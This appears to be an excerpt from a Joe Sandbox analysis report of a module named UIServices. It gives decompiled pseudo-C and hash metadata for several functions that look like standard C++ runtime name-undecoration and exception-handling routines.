                                                    				_t89 =  *0x23c74360; // 0x0
                                                    				_t120 = __r8;
                                                    				_v48 = _v48 & 0x00000000;
                                                    				_t90 = _t89 + 1;
                                                    				 *0x23c74360 = _t90;
                                                    				r10d =  *_t90;
                                                    				r8d = r10d;
                                                    				r8d = r8d - 0x41;
                                                    				if (__eflags == 0) goto 0x23c6a201;
                                                    				r8d = r8d - 1;
                                                    				if (__eflags == 0) goto 0x23c6a1d3;
                                                    				if (r8d == 1) goto 0x23c6a1cb;
                                                    				if ( *_t90 == 0) goto 0x23c6a1bf;
                                                    				_t41 =  *((char*)(_t90 + 1));
                                                    				if (_t41 == 0) goto 0x23c6a1bf;
                                                    				if (r9d != 0) goto 0x23c6a1d8;
                                                    				r10d = r10d << 4;
                                                    				_t8 = _t90 + 2; // 0x3
                                                    				_t76 = _t8;
                                                    				 *0x23c74360 = _t76;
                                                    				if (_t41 + 0xfffffcd0 + r10d - 1 <= 0) goto 0x23c6a113;
                                                    				E00007FFC7FFC23C66E4C(E00007FFC7FFC23C68150(0x2c, _t76, __rcx,  &_v56),  &_v40, __rdx, __r10);
                                                    				E00007FFC7FFC23C66F74( &_v56,  &_v24, _t76);
                                                    				_v56 =  *_t76;
                                                    				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                    				r8b = 0x3e;
                                                    				E00007FFC7FFC23C66FA0( &_v56,  &_v24);
                                                    				_t77 =  *0x23c74360; // 0x0
                                                    				_v56 =  *_t76;
                                                    				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                    				if ( *_t77 != 0x24) goto 0x23c6a148;
                                                    				_t78 = _t77 + 1;
                                                    				 *0x23c74360 = _t78;
                                                    				goto 0x23c6a16c;
                                                    				r8b = 0x5e;
                                                    				E00007FFC7FFC23C66FA0( &_v56,  &_v24);
                                                    				_t98 =  *_t78;
                                                    				_t79 =  *0x23c74360; // 0x0
                                                    				_v56 = _t98;
                                                    				_v48 =  *((intOrPtr*)(_t78 + 8));
                                                    				_t118 = _t98;
                                                    				if ( *_t79 == 0) goto 0x23c6a180;
                                                    				 *0x23c74360 = _t79 + 1;
                                                    				goto 0x23c6a1b0;
                                                    				if (_v48 - 1 > 0) goto 0x23c6a1b0;
                                                    				if (_t118 == 0) goto 0x23c6a1a4;
                                                    				E00007FFC7FFC23C66AA0(_t79 + 1, _t86,  &_v56, 0x23c71ac0);
                                                    				goto 0x23c6a1b0;
                                                    				asm("bts edx, 0xe");
                                                    				 *_t86 = 0x23c71ac0;
                                                    				_t86[1] = 1;
                                                    				goto 0x23c6a240;
                                                    				 *_t86 = 0x23c71ac0;
                                                    				goto 0x23c6a23c;
                                                    				 *0x23c71ac0 = 5;
                                                    				goto 0x23c6a1f5;
                                                    				if (r9d == 0) goto 0x23c6a1e6;
                                                    				_t86[1] = _t86[1] & 0x00000000;
                                                    				 *_t86 =  *_t86 & 0x00000000;
                                                    				_t86[1] = 2;
                                                    				goto 0x23c6a240;
                                                    				 *_t120 = 1;
                                                    				E00007FFC7FFC23C68150(0x3e, _t79 + 1, _t86,  &_v56);
                                                    				goto 0x23c6a231;
                                                    				if (r9d != 0) goto 0x23c6a22d;
                                                    				r8d =  *0x23c71ac0;
                                                    				_t35 = _t118 - 2; // -67
                                                    				_t50 = _t35;
                                                    				if (_t50 - 1 <= 0) goto 0x23c6a220;
                                                    				if (r8d != 1) goto 0x23c6a22d;
                                                    				 *0x23c71ac0 = 4;
                                                    				goto 0x23c6a226;
                                                    				 *0x23c71ac0 = 5;
                                                    				_t104 =  *0x23c74360; // 0x0
                                                    				_t36 = _t104 + 1; // 0x1
                                                    				 *_t86 =  *_t86 & 0x00000000;
                                                    				 *0x23c74360 = _t36;
                                                    				_t86[1] = _t86[1] & 0x00000000;
                                                    				return _t50;
                                                    			}




















                                                    0x7ffc23c6a04c
                                                    0x7ffc23c6a051
                                                    0x7ffc23c6a05e
                                                    0x7ffc23c6a063
                                                    0x7ffc23c6a066
                                                    0x7ffc23c6a06d
                                                    0x7ffc23c6a070
                                                    0x7ffc23c6a074
                                                    0x7ffc23c6a077
                                                    0x7ffc23c6a07e
                                                    0x7ffc23c6a082
                                                    0x7ffc23c6a085
                                                    0x7ffc23c6a089
                                                    0x7ffc23c6a08f
                                                    0x7ffc23c6a093
                                                    0x7ffc23c6a09d
                                                    0x7ffc23c6a0a6
                                                    0x7ffc23c6a0ac
                                                    0x7ffc23c6a0b2
                                                    0x7ffc23c6a0bb
                                                    0x7ffc23c6a0c3
                                                    0x7ffc23c6a0cd
                                                    0x7ffc23c6a0cd
                                                    0x7ffc23c6a0d4
                                                    0x7ffc23c6a0de
                                                    0x7ffc23c6a0f1
                                                    0x7ffc23c6a101
                                                    0x7ffc23c6a10c
                                                    0x7ffc23c6a110
                                                    0x7ffc23c6a113
                                                    0x7ffc23c6a11e
                                                    0x7ffc23c6a129
                                                    0x7ffc23c6a130
                                                    0x7ffc23c6a134
                                                    0x7ffc23c6a13a
                                                    0x7ffc23c6a13c
                                                    0x7ffc23c6a13f
                                                    0x7ffc23c6a146
                                                    0x7ffc23c6a148
                                                    0x7ffc23c6a153
                                                    0x7ffc23c6a158
                                                    0x7ffc23c6a15e
                                                    0x7ffc23c6a165
                                                    0x7ffc23c6a169
                                                    0x7ffc23c6a16f
                                                    0x7ffc23c6a172
                                                    0x7ffc23c6a177
                                                    0x7ffc23c6a17e
                                                    0x7ffc23c6a184
                                                    0x7ffc23c6a189
                                                    0x7ffc23c6a196
                                                    0x7ffc23c6a1a2
                                                    0x7ffc23c6a1b0
                                                    0x7ffc23c6a1b4
                                                    0x7ffc23c6a1b7
                                                    0x7ffc23c6a1ba
                                                    0x7ffc23c6a1c6
                                                    0x7ffc23c6a1c9
                                                    0x7ffc23c6a1cb
                                                    0x7ffc23c6a1d1
                                                    0x7ffc23c6a1d6
                                                    0x7ffc23c6a1d8
                                                    0x7ffc23c6a1dc
                                                    0x7ffc23c6a1e0
                                                    0x7ffc23c6a1e4
                                                    0x7ffc23c6a1e8
                                                    0x7ffc23c6a1f0
                                                    0x7ffc23c6a1ff
                                                    0x7ffc23c6a204
                                                    0x7ffc23c6a206
                                                    0x7ffc23c6a209
                                                    0x7ffc23c6a209
                                                    0x7ffc23c6a210
                                                    0x7ffc23c6a216
                                                    0x7ffc23c6a218
                                                    0x7ffc23c6a21e
                                                    0x7ffc23c6a220
                                                    0x7ffc23c6a226
                                                    0x7ffc23c6a22d
                                                    0x7ffc23c6a231
                                                    0x7ffc23c6a235
                                                    0x7ffc23c6a23c
                                                    0x7ffc23c6a252

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$NameName::
                                                    • String ID:
                                                    • API String ID: 168861036-0
                                                    • Opcode ID: 5f043ee59f9ebb7bd0428048c60ae5a03d170c8436db0794779eb3a5a89de9d1
                                                    • Instruction ID: adfced9df48477fba795dac6721335a72deb4a0b943255529f772e7baeeeb5bd
                                                    • Opcode Fuzzy Hash: 5f043ee59f9ebb7bd0428048c60ae5a03d170c8436db0794779eb3a5a89de9d1
                                                    • Instruction Fuzzy Hash: F3514CB6F1866A89E710CF68EC403BC37A4FB84758F544271DA0E67795CF3AA491CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E00007FFC7FFC23C6C134(signed int __ecx, void* __edi, intOrPtr* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r14, long long _a8, long long _a16) {
                                                    				char _v24;
                                                    				char _v40;
                                                    				char _v56;
                                                    				signed int _v64;
                                                    				char _v72;
                                                    				signed int _t36;
                                                    				signed int _t43;
                                                    				void* _t44;
                                                    				signed int _t45;
                                                    				intOrPtr* _t55;
                                                    				intOrPtr* _t56;
                                                    				char* _t57;
                                                    				char* _t58;
                                                    				signed long long* _t62;
                                                    				signed long long _t70;
                                                    				long long _t94;
                                                    
                                                    				_t80 = __rsi;
                                                    				_t79 = __rdi;
                                                    				_t55 = __rax;
                                                    				_t45 = __ecx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __r14;
                                                    				 *__rcx =  *__rcx & 0x00000000;
                                                    				_t62 = __rcx;
                                                    				__rcx[1] = __rcx[1] & 0x00000000;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C6DA5C(_t44, __ecx, 1, __edi, __rcx,  &_v56, __rdi, __rsi, __r8, __r10, __r11);
                                                    				_t94 = "::";
                                                    				 *__rcx =  *_t55;
                                                    				_t36 =  *(_t55 + 8);
                                                    				__rcx[1] = _t36;
                                                    				_t56 =  *0x23c74360; // 0x0
                                                    				if (_t36 != 0) goto 0x23c6c1d6;
                                                    				if ( *_t56 == 0) goto 0x23c6c1d6;
                                                    				if ( *_t56 == 0x40) goto 0x23c6c1db;
                                                    				_v72 = _t94;
                                                    				_v64 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x40], xmm0");
                                                    				E00007FFC7FFC23C6BC80(__edi, __rcx,  &_v56, _t79, _t80, __r10, __r11, __r12);
                                                    				E00007FFC7FFC23C66F48(_t56,  &_v40,  &_v72);
                                                    				E00007FFC7FFC23C66F74(_t56,  &_v24, _t62);
                                                    				_t70 =  *_t56;
                                                    				 *_t62 = _t70;
                                                    				_t62[1] =  *(_t56 + 8);
                                                    				_t57 =  *0x23c74360; // 0x0
                                                    				if ( *_t57 != 0x40) goto 0x23c6c1e7;
                                                    				_t58 = _t57 + 1;
                                                    				 *0x23c74360 = _t58;
                                                    				goto 0x23c6c25a;
                                                    				if ( *_t58 == 0) goto 0x23c6c1fa;
                                                    				_t62[1] = _t62[1] & 0x00000000;
                                                    				 *_t62 =  *_t62 & 0x00000000;
                                                    				_t62[1] = 2;
                                                    				goto 0x23c6c25a;
                                                    				if (_t70 != 0) goto 0x23c6c212;
                                                    				_t62[1] = _t62[1] & _t45;
                                                    				_t62[1] = 1;
                                                    				 *_t62 = 0x23c71ac0;
                                                    				goto 0x23c6c25a;
                                                    				_v72 = _t94;
                                                    				_v64 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				_v64 = _v64 & 0x00000000;
                                                    				asm("movdqa [ebp-0x30], xmm0");
                                                    				_v72 = 0x23c71ac0;
                                                    				E00007FFC7FFC23C66F48( &_v72,  &_v24,  &_v56);
                                                    				E00007FFC7FFC23C66F74(0x23c71ac0,  &_v40, _t62);
                                                    				 *_t62 =  *0x23c71ac0;
                                                    				_t43 =  *0x7FFC23C71AC8;
                                                    				_t62[1] = _t43;
                                                    				return _t43;
                                                    			}



















                                                    0x7ffc23c6c134
                                                    0x7ffc23c6c134
                                                    0x7ffc23c6c134
                                                    0x7ffc23c6c134
                                                    0x7ffc23c6c134
                                                    0x7ffc23c6c139
                                                    0x7ffc23c6c146
                                                    0x7ffc23c6c14a
                                                    0x7ffc23c6c14d
                                                    0x7ffc23c6c151
                                                    0x7ffc23c6c15a
                                                    0x7ffc23c6c15f
                                                    0x7ffc23c6c169
                                                    0x7ffc23c6c16c
                                                    0x7ffc23c6c171
                                                    0x7ffc23c6c174
                                                    0x7ffc23c6c17b
                                                    0x7ffc23c6c180
                                                    0x7ffc23c6c185
                                                    0x7ffc23c6c187
                                                    0x7ffc23c6c18f
                                                    0x7ffc23c6c196
                                                    0x7ffc23c6c19a
                                                    0x7ffc23c6c19f
                                                    0x7ffc23c6c1af
                                                    0x7ffc23c6c1be
                                                    0x7ffc23c6c1c3
                                                    0x7ffc23c6c1c6
                                                    0x7ffc23c6c1cc
                                                    0x7ffc23c6c1cf
                                                    0x7ffc23c6c1d9
                                                    0x7ffc23c6c1db
                                                    0x7ffc23c6c1de
                                                    0x7ffc23c6c1e5
                                                    0x7ffc23c6c1ea
                                                    0x7ffc23c6c1ec
                                                    0x7ffc23c6c1f0
                                                    0x7ffc23c6c1f4
                                                    0x7ffc23c6c1f8
                                                    0x7ffc23c6c204
                                                    0x7ffc23c6c206
                                                    0x7ffc23c6c209
                                                    0x7ffc23c6c20d
                                                    0x7ffc23c6c210
                                                    0x7ffc23c6c212
                                                    0x7ffc23c6c21a
                                                    0x7ffc23c6c225
                                                    0x7ffc23c6c22d
                                                    0x7ffc23c6c231
                                                    0x7ffc23c6c236
                                                    0x7ffc23c6c23a
                                                    0x7ffc23c6c249
                                                    0x7ffc23c6c251
                                                    0x7ffc23c6c254
                                                    0x7ffc23c6c257
                                                    0x7ffc23c6c26c

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: c43750c4fa97d1e8d572e3b02b60efc17716b65408e7882041c43f40baf96658
                                                    • Instruction ID: 2d07d960faf978c67ad247ebaecf73d38899b5f940ad8df086cbe794fbbca858
                                                    • Opcode Fuzzy Hash: c43750c4fa97d1e8d572e3b02b60efc17716b65408e7882041c43f40baf96658
                                                    • Instruction Fuzzy Hash: 4F414872A08B69C9EB01CF68E8453AC37B0FB88B48F548265DA4E67759DF789441C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00007FFC7FFC23C644B0(void* __ecx, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
                                                    				char _v80;
                                                    				signed long long _v96;
                                                    				long long _v104;
                                                    				long long _v136;
                                                    				signed long long _v144;
                                                    				signed int _v152;
                                                    				long long _v160;
                                                    				long long _v168;
                                                    				signed long long _v176;
                                                    				signed int _v184;
                                                    				void* __rbx;
                                                    				void* _t105;
                                                    				void* _t124;
                                                    				long long _t125;
                                                    				signed long long _t129;
                                                    				signed int _t130;
                                                    				long long _t132;
                                                    				signed long long _t134;
                                                    				long long _t153;
                                                    				intOrPtr* _t154;
                                                    				void* _t155;
                                                    				signed long long _t160;
                                                    
                                                    				_t124 = _t155;
                                                    				r12d = 0;
                                                    				_v184 = r12d;
                                                    				_a24 = _a24 & r12d;
                                                    				_v176 = _v176 & _t160;
                                                    				_v152 = _v152 & _t160;
                                                    				 *((intOrPtr*)(_t124 - 0x80)) = r12b;
                                                    				 *(_t124 - 0x7c) =  *(_t124 - 0x7c) & r12d;
                                                    				 *(_t124 - 0x78) =  *(_t124 - 0x78) & r12d;
                                                    				 *(_t124 - 0x74) =  *(_t124 - 0x74) & r12d;
                                                    				 *(_t124 - 0x70) =  *(_t124 - 0x70) & r12d;
                                                    				 *(_t124 - 0x6c) =  *(_t124 - 0x6c) & r12d;
                                                    				E00007FFC7FFC23C664B0(_t124);
                                                    				_t125 =  *((intOrPtr*)(_t124 + 0x28));
                                                    				_v160 = _t125;
                                                    				E00007FFC7FFC23C664B0(_t125);
                                                    				_v168 =  *((intOrPtr*)(_t125 + 0x20));
                                                    				_t153 =  *((intOrPtr*)(__rcx + 0x50));
                                                    				_a32 = _t153;
                                                    				_t132 =  *((intOrPtr*)(__rcx + 0x40));
                                                    				_v136 =  *((intOrPtr*)(__rcx + 0x30));
                                                    				_v104 =  *((intOrPtr*)(__rcx + 0x48));
                                                    				_t129 =  *((intOrPtr*)(__rcx + 0x68));
                                                    				_v96 = _t129;
                                                    				_a16 =  *((intOrPtr*)(__rcx + 0x78));
                                                    				_a8 =  *((intOrPtr*)(__rcx + 0x38));
                                                    				E00007FFC7FFC23C61894( *((intOrPtr*)(__rcx + 0x38)), _t132);
                                                    				E00007FFC7FFC23C664B0(_t129);
                                                    				 *((long long*)(_t129 + 0x20)) = _t153;
                                                    				E00007FFC7FFC23C664B0(_t129);
                                                    				 *((long long*)(_t129 + 0x28)) = _t132;
                                                    				E00007FFC7FFC23C664B0(_t129);
                                                    				E00007FFC7FFC23C6EFB0(_t129,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x20)) + 0x28)));
                                                    				_v144 = _t129;
                                                    				if ( *((intOrPtr*)(__rcx + 0x58)) == _t160) goto 0x23c645b2;
                                                    				_a24 = 1;
                                                    				E00007FFC7FFC23C664B0(_t129);
                                                    				_v152 =  *((intOrPtr*)(_t129 + 0x70));
                                                    				r8d = 0x100;
                                                    				E00007FFC7FFC23C61060(_v136,  *((intOrPtr*)(__rcx + 0x28)));
                                                    				_v176 = _t129;
                                                    				if (_t129 - 2 >= 0) goto 0x23c645ea;
                                                    				_t134 =  *((intOrPtr*)(_t155 - 0xa8 + 0x70 + _t129 * 8));
                                                    				if (_t134 == 0) goto 0x23c645e4;
                                                    				_v176 = _t134;
                                                    				goto 0x23c645ea;
                                                    				abort();
                                                    				E00007FFC7FFC23C61090(_t134,  *((intOrPtr*)(__rcx + 0x28)));
                                                    				_v184 = 1;
                                                    				E00007FFC7FFC23C664B0(_t129);
                                                    				 *(_t129 + 0x40) =  *(_t129 + 0x40) & 0x00000000;
                                                    				E00007FFC7FFC23C664B0(_t129);
                                                    				 *((intOrPtr*)(_t129 + 0x78)) = _a16;
                                                    				_t154 = _a32;
                                                    				if (_a24 == 0) goto 0x23c64651;
                                                    				E00007FFC7FFC23C62070(1, _t154);
                                                    				_t130 = _v152;
                                                    				r8d =  *((intOrPtr*)(_t130 + 0x18));
                                                    				goto 0x23c6465e;
                                                    				r8d =  *((intOrPtr*)(_t154 + 0x18));
                                                    				RaiseException(??, ??, ??, ??);
                                                    				r12d = _v184;
                                                    				E00007FFC7FFC23C6EFF0(_t130, _v176, _v144);
                                                    				if (r12d != 0) goto 0x23c646bc;
                                                    				if ( *_t154 != 0xe06d7363) goto 0x23c646bc;
                                                    				if ( *((intOrPtr*)(_t154 + 0x18)) != 4) goto 0x23c646bc;
                                                    				if ( *((intOrPtr*)(_t154 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c646bc;
                                                    				if (E00007FFC7FFC23C620F0(_t130,  *((intOrPtr*)(_t154 + 0x28))) == 0) goto 0x23c646bc;
                                                    				E00007FFC7FFC23C62070(1, _t154);
                                                    				E00007FFC7FFC23C664B0(_t130);
                                                    				 *((long long*)(_t130 + 0x20)) = _v168;
                                                    				E00007FFC7FFC23C664B0(_t130);
                                                    				 *((long long*)(_t130 + 0x28)) = _v160;
                                                    				E00007FFC7FFC23C664B0(_t130);
                                                    				 *((intOrPtr*)(_t130 + 0x78)) = _a8;
                                                    				_t105 = E00007FFC7FFC23C664B0(_t130);
                                                    				 *((intOrPtr*)(_t130 + 0x78)) = 0xfffffffe;
                                                    				return _t105;
                                                    			}

























                                                    0x7ffc23c644b0
                                                    0x7ffc23c644c6
                                                    0x7ffc23c644c9
                                                    0x7ffc23c644ce
                                                    0x7ffc23c644d6
                                                    0x7ffc23c644db
                                                    0x7ffc23c644e0
                                                    0x7ffc23c644e4
                                                    0x7ffc23c644e8
                                                    0x7ffc23c644ec
                                                    0x7ffc23c644f0
                                                    0x7ffc23c644f4
                                                    0x7ffc23c644f8
                                                    0x7ffc23c644fd
                                                    0x7ffc23c64501
                                                    0x7ffc23c64506
                                                    0x7ffc23c6450f
                                                    0x7ffc23c64514
                                                    0x7ffc23c64518
                                                    0x7ffc23c64520
                                                    0x7ffc23c64528
                                                    0x7ffc23c64535
                                                    0x7ffc23c6453a
                                                    0x7ffc23c6453e
                                                    0x7ffc23c64546
                                                    0x7ffc23c64550
                                                    0x7ffc23c6455a
                                                    0x7ffc23c6455f
                                                    0x7ffc23c64564
                                                    0x7ffc23c64568
                                                    0x7ffc23c6456d
                                                    0x7ffc23c64571
                                                    0x7ffc23c64586
                                                    0x7ffc23c6458e
                                                    0x7ffc23c64597
                                                    0x7ffc23c64599
                                                    0x7ffc23c645a4
                                                    0x7ffc23c645ad
                                                    0x7ffc23c645b2
                                                    0x7ffc23c645c0
                                                    0x7ffc23c645c8
                                                    0x7ffc23c645d1
                                                    0x7ffc23c645d3
                                                    0x7ffc23c645db
                                                    0x7ffc23c645dd
                                                    0x7ffc23c645e2
                                                    0x7ffc23c645e4
                                                    0x7ffc23c645f0
                                                    0x7ffc23c64601
                                                    0x7ffc23c64609
                                                    0x7ffc23c6460e
                                                    0x7ffc23c64612
                                                    0x7ffc23c6461e
                                                    0x7ffc23c64621
                                                    0x7ffc23c64631
                                                    0x7ffc23c64638
                                                    0x7ffc23c6463d
                                                    0x7ffc23c64646
                                                    0x7ffc23c6464f
                                                    0x7ffc23c64655
                                                    0x7ffc23c6465e
                                                    0x7ffc23c64664
                                                    0x7ffc23c64680
                                                    0x7ffc23c64688
                                                    0x7ffc23c64690
                                                    0x7ffc23c64696
                                                    0x7ffc23c646a3
                                                    0x7ffc23c646b0
                                                    0x7ffc23c646b7
                                                    0x7ffc23c646bc
                                                    0x7ffc23c646c1
                                                    0x7ffc23c646c5
                                                    0x7ffc23c646ca
                                                    0x7ffc23c646ce
                                                    0x7ffc23c646da
                                                    0x7ffc23c646dd
                                                    0x7ffc23c646e2
                                                    0x7ffc23c646fc

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$CreateFrameInfo
                                                    • String ID: csm
                                                    • API String ID: 2697087660-1018135373
                                                    • Opcode ID: c481a33ba08260d5865ea2b889ca60b5099e1cb82d5f69995c4f6df4fd766d99
                                                    • Instruction ID: a29ec95ee255e7afdf71be32e5f57d2825a39c4de2ebf42e97011e890d8fdc0a
                                                    • Opcode Fuzzy Hash: c481a33ba08260d5865ea2b889ca60b5099e1cb82d5f69995c4f6df4fd766d99
                                                    • Instruction Fuzzy Hash: 32515A7271876587E620EB2AE94026E77A4FB88B95F100274EB8D17B59CF3CE461CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00007FFC7FFC23C697B4(void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r8, long long _a8) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				char _v56;
                                                    				intOrPtr _v72;
                                                    				void* _t33;
                                                    				char* _t42;
                                                    				long long _t45;
                                                    				intOrPtr* _t46;
                                                    				void* _t50;
                                                    				void* _t54;
                                                    				void* _t72;
                                                    				void* _t75;
                                                    
                                                    				_t72 = __r8;
                                                    				_t67 = __rsi;
                                                    				_t66 = __rdi;
                                                    				_t33 = __edx;
                                                    				_a8 = __rbx;
                                                    				_t50 = __rcx;
                                                    				E00007FFC7FFC23C66D20(__rax, __rcx,  &_v56, __rdx, __rsi);
                                                    				_t42 =  *0x23c74360; // 0x0
                                                    				if ( *_t42 == 0) goto 0x23c69899;
                                                    				if ( *_t42 == 0x3f) goto 0x23c6985e;
                                                    				if ( *_t42 == 0x58) goto 0x23c697f9;
                                                    				_t54 = _t50;
                                                    				E00007FFC7FFC23C6B428(_t33, __edi, _t42, _t50, _t54,  &_v56, __rdi, _t67, _t72, _t75);
                                                    				goto 0x23c698b7;
                                                    				 *0x23c74360 = _t42 + 1;
                                                    				if (_v56 != _t54) goto 0x23c69835;
                                                    				_v32 = 4;
                                                    				_v40 = "void";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66CF4("void", _t50,  &_v40);
                                                    				goto 0x23c698b7;
                                                    				_v32 = 5;
                                                    				_t45 = "void ";
                                                    				_v40 = _t45;
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66CF4(_t45,  &_v24,  &_v40);
                                                    				goto 0x23c698ab;
                                                    				_t46 = _t45 + 1;
                                                    				_v40 = _t45;
                                                    				_v32 = 0;
                                                    				_v72 = 0;
                                                    				 *0x23c74360 = _t46;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C68F1C(__edi, _t50,  &_v24,  &_v56, _t66, _t67,  &_v40);
                                                    				_v56 =  *_t46;
                                                    				_v48 =  *((intOrPtr*)(_t46 + 8));
                                                    				goto 0x23c697e8;
                                                    				_v32 = 0;
                                                    				_v40 = 0x23c71ac0;
                                                    				return E00007FFC7FFC23C66F74( &_v40, _t50,  &_v56);
                                                    			}

















                                                    0x7ffc23c697b4
                                                    0x7ffc23c697b4
                                                    0x7ffc23c697b4
                                                    0x7ffc23c697b4
                                                    0x7ffc23c697b4
                                                    0x7ffc23c697c1
                                                    0x7ffc23c697c8
                                                    0x7ffc23c697cd
                                                    0x7ffc23c697d8
                                                    0x7ffc23c697e1
                                                    0x7ffc23c697e6
                                                    0x7ffc23c697ec
                                                    0x7ffc23c697ef
                                                    0x7ffc23c697f4
                                                    0x7ffc23c69800
                                                    0x7ffc23c6980b
                                                    0x7ffc23c6980d
                                                    0x7ffc23c6981b
                                                    0x7ffc23c69822
                                                    0x7ffc23c69826
                                                    0x7ffc23c6982b
                                                    0x7ffc23c69830
                                                    0x7ffc23c69835
                                                    0x7ffc23c6983c
                                                    0x7ffc23c69843
                                                    0x7ffc23c6984b
                                                    0x7ffc23c6984f
                                                    0x7ffc23c69854
                                                    0x7ffc23c6985c
                                                    0x7ffc23c6985e
                                                    0x7ffc23c69861
                                                    0x7ffc23c69865
                                                    0x7ffc23c6986c
                                                    0x7ffc23c69878
                                                    0x7ffc23c6987f
                                                    0x7ffc23c69882
                                                    0x7ffc23c6988a
                                                    0x7ffc23c69891
                                                    0x7ffc23c69894
                                                    0x7ffc23c698a0
                                                    0x7ffc23c698a3
                                                    0x7ffc23c698c4

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: void$void
                                                    • API String ID: 2943138195-3746155364
                                                    • Opcode ID: a6f247cb1c09d34bdd6c4d34991a898b94f8244f30be933648e557672d6aca48
                                                    • Instruction ID: bd18ef745ea0cfc849d82676edb41eb530ab816cbe291c78799fd80b8455060a
                                                    • Opcode Fuzzy Hash: a6f247cb1c09d34bdd6c4d34991a898b94f8244f30be933648e557672d6aca48
                                                    • Instruction Fuzzy Hash: 1D313762F18B6998FB04CFA8EC410EC37B4FB88748B440276DE4E62B59DF389144CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
